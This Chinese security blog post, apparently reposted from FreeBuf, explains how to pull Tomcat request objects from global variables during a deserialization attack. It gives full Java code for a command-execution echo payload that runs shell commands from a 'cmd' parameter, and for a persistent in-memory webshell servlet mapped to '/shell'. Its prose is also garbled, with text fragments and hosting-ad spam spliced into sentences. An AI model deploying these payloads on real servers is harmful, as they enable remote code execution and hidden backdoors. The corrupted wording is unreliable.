从全局变量寻找到Tomcat回显方式

前言

对于回显的从全获取主要是在ApplicationFilterChain​类的lastServicedRequest / lastServicedResponse​两个属性 ，是局变使用的ThreadLocal进行修饰的，并且
，量寻在执行请求的回显过程中，通过反射修改属性值，从全能够记录下当前线程的局变request对象的值。

之后在反序列化利用过程中方便利用ThreadLocal取出对应的量寻request进行内存马的服务器租用注入关键步骤
。

这里转而通过寻找全局存储的回显request / response进行内存马的注入操作。

正文

如何获取的从全回显

师傅通过这种方式关注到了org.apache.coyote.AbstractProcessor​类中 ，存在有两个属性值名为request / response​分别是局变使用final​修饰的org.apache.coyote.Request / org.apache.coyote.Response类型的变量 。

我们的量寻目标是注入一个内存马 
，这里以上篇一样的回显Servlet内存马举例说明。

对于Servlet内存马，源码下载从全我们需要获取到对应ServletContext​ ，局变但是量寻在org.apache.coyote.Request​类中 ，并没有直接可以获取的方法存在
，我们可以关注到该类的setNote方法的实现 。

这个方法是用来存放私有数据的 ，在其中举了一个例子，其中描述了对于该类的notes​数组中的下标为1的位置是亿华云用来存放的HttpServletRequest​对象的 ，值得注意的是其中的0-8序号存放的是servlet Container​中的数据，9-16序号存放的是connector这个组件的数据。

因为只要获取到了HttpServletRequest​对象，也就能够调用getServletContext方法获取我们需要的免费模板上下文。

我们可以通过getNote(1)来获取 ，

好了，言归正传
，转到获取request对象，

在一个Controller调用过程中，其中的Http11Processor​类是继承了AbstractProcessor这个类的。

所以我们只需要获取到Http11Processor类对象，我们就能够成功获取到我们需要的request对象

目标放在调用Http11Processor之前是否对该对象进行持久化存储，或者直接点对其中的request对象进行了持久化存储

我们进而关注到了AbstractProtocol$ConnectionHandler​类中
，高防服务器在调用process​方法的过程中调用了register方法对processor对象进行了存储。

传入的是processor ，他到底是什么，我们可以追溯到该方法的开头 ，存在有来源 。

我们可以知道，这个processor对象是获取的是当前的Http11Processor对象，模板下载

对于register方法，我们可以跟进一下。

首先从processor中获取了RequestInfo​对象的信息之后调用了setGlobalProcessor方法。

调用了addRequestProcessor方法进行添加 。

也即是 ，将其添加进入了processors这个List对象中，

所以现在我们的目的是获取到AbstractProtocol$ConnectionHandler​类的global​属性值 ，也即是获取到AbstractProtocol这个类对象。

在调用这一步之后看起，发现了在CoyoteAdapter#service​方法中 ，存在有Connector对象的操作 。

对于Connector对象

这是一个connector组件的一个实现，

其中存在有一个protocolHandler​属性，是一个ProtocolHandler类对象 。

前面我们需要获取的是AbstractProtocol类对象，同样是实现了这个接口，

而且于HTTP连接相关的类都实现了这个接口的 ，

所以我们能够从该属性中获取到我们需要的AbstractProtocol对象值，

现在我们需要获取的对象就是一个Connector对象 ，

而对于连接器的创建，在tomcat容器进行启动的时候 ，将会调用setConnector​方法将connector放在service中去，也即是StandardService类对象。

对于StandardService的获取，我们可以直接从当前线程中进行获取。

这样
，一条链子进行成了

总结一下 ：

StandardService​==>connector​==>Connector.protocolHandler​==>Http11NioProtocol.handler​==>AbstractProtocol$ConnectionHandler.global​==>RequestGroupInfo.processors​==>RequestInfo.req

构造回显内存马

非持久化

这种应该也不算是内存马吧，也就是每次发送发序列化数据的时候 ，通过利用获取的request / response进行命令执行和回显 。

对于实验的环境同样使用的是前面一样的环境 -- 使用springboot搭建的环境，

我首先创建了一个getField方法方便获取属性值。

将具体逻辑放在了static代码块中。

值得注意的有两点

在进行connector的筛选中，调用了getScheme().toLowerCase().contains("http")方法来帅选和http相关的连接器 。

在命令执行的位置
，通过判断有无特征来决定是否执行命令。

完整的实现

复制//

从线程中获取类加载器WebappClassLoaderBase

WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); //

获取TomcatEmbeddedContext对象

Context context = contextClassLoader.getResources().getContext(); //

从上下文中获取ApplicationContext对象

ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context")); //

从Application中获取StandardService对象

StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service")); //

从StandardService中获取Connector数组

Connector[] connectors = standardService.findConnectors(); for (Connector connector : connectors) { if (connector.getScheme().toLowerCase().contains("http")) { //

获取Connector对象的protocolHandler属性值

ProtocolHandler protocolHandler = connector.getProtocolHandler(); //

筛选我们需要的Abstract

if (protocolHandler instanceof AbstractProtocol) { //

从Http11NioProtocol对象中获取到handler属性，也即是AbstractProtocol中的handler属性 ，存在有一个getHandler方法可以直接返回

//

反射获取该方法

Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler"); getHandler.setAccessible(true); AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler); //

从上面获取的handler中取出global属性值

RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global")); //

之后从上面获取的RequestGroupInfo对象中获取到processors这个List对象 ，元素是RequestInfo对象

ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors")); //

遍历List中的元素

for (Object processor : processors) { RequestInfo requestInfo = (RequestInfo) processor; //

获取对应的Request对象

org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req")); //

通过不同的请求进行处理

if ((req.queryString()).toString().toLowerCase().contains("cmd")) { //

获取对应的Request对象

org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1); //

执行希望执行的命令

String cmd = request.getParameter("cmd"); String[] cmds = null; if (cmd != null) { if (System.getProperty("os.name").toLowerCase().contains("win")) { cmds = new String[] { "cmd.exe", "/c", cmd}; } else { cmds = new String[] { "/bin/bash", "-c", cmd}; } java.util.Scanner c = new java.util.Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A"); String o = null; o = c.hasNext() ? c.next() : o; c.close(); PrintWriter writer = request.getResponse().getWriter(); writer.println(o); writer.flush(); writer.close(); } }1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.28.29.30.31.32.33.34.35.36.37.38.39.40.41.42.43.44.45.46.47.48.49.50.51.52.53.54.55.

测试一下

首先通过CC6_plus生成序列化数据1.ser

发送给漏洞端。

在访问路由中添加了一个cmd的GET传参，最后能够发现，成功执行了的。

持久化

对于持久化也就是真正的内存马实现，主要是通过和前面的Tomcat Servlet内存马相结合的模式，

也即是从request对象中获取到了ServletContext对象来执行恶意逻辑 。

完整实现

复制//

从线程中获取类加载器WebappClassLoaderBase

WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); //

获取TomcatEmbeddedContext对象

Context context = contextClassLoader.getResources().getContext(); //

从上下文中获取ApplicationContext对象

ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context")); //

从Application中获取StandardService对象

StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service")); //

从StandardService中获取Connector数组

Connector[] connectors = standardService.findConnectors(); for (Connector connector : connectors) { if (connector.getScheme().toLowerCase().contains("http")) { //

获取Connector对象的protocolHandler属性值

ProtocolHandler protocolHandler = connector.getProtocolHandler(); //

筛选我们需要的Abstract

if (protocolHandler instanceof AbstractProtocol) { //

从Http11NioProtocol对象中获取到handler属性 ，也即是AbstractProtocol中的handler属性，存在有一个getHandler方法可以直接返回

//

反射获取该方法

Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler"); getHandler.setAccessible(true); AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler); //

从上面获取的handler中取出global属性值

RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global")); //

之后从上面获取的RequestGroupInfo对象中获取到processors这个List对象，元素是RequestInfo对象

ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors")); //

遍历List中的元素

for (Object processor : processors) { RequestInfo requestInfo = (RequestInfo) processor; //

获取对应的Request对象

org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req")); org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1); ServletContext servletContext = request.getServletContext(); String name = "xxx"; if (servletContext.getServletRegistration(name) == null) { StandardContext o = null; //

从 request 的 ServletContext 对象中循环判断获取 Tomcat StandardContext 对象

while (o == null) { Field f = servletContext.getClass().getDeclaredField("context"); f.setAccessible(true); Object object = f.get(servletContext); if (object instanceof ServletContext) { servletContext = (ServletContext) object; } else if (object instanceof StandardContext) { o = (StandardContext) object; } } //

自定义servlet

Servlet servlet = new TomcatMemshell1(); //

用Wrapper封装servlet

Wrapper newWrapper = o.createWrapper(); newWrapper.setName(name); newWrapper.setLoadOnStartup(1); newWrapper.setServlet(servlet); //

向children中添加Wrapper

o.addChild(newWrapper); //

添加servlet的映射

o.addServletMappingDecoded("/shell", name);1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.28.29.30.31.32.33.34.35.36.37.38.39.40.41.42.43.44.45.46.47.48.49.50.51.52.53.54.55.56.57.58.59.60.61.62.63.64.65.66.

简单测试一下
，

启动反序列漏洞环境，

发送序列化数据，

成功进行反序列化
，

验证是否成功注入，

成功创建了一个恶意的Servlet。

Ref

https://github.com/Litch1-v/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java

https://xz.aliyun.com/t/7348

本文作者
：superLeeH， 转载请注明来自FreeBuf.COM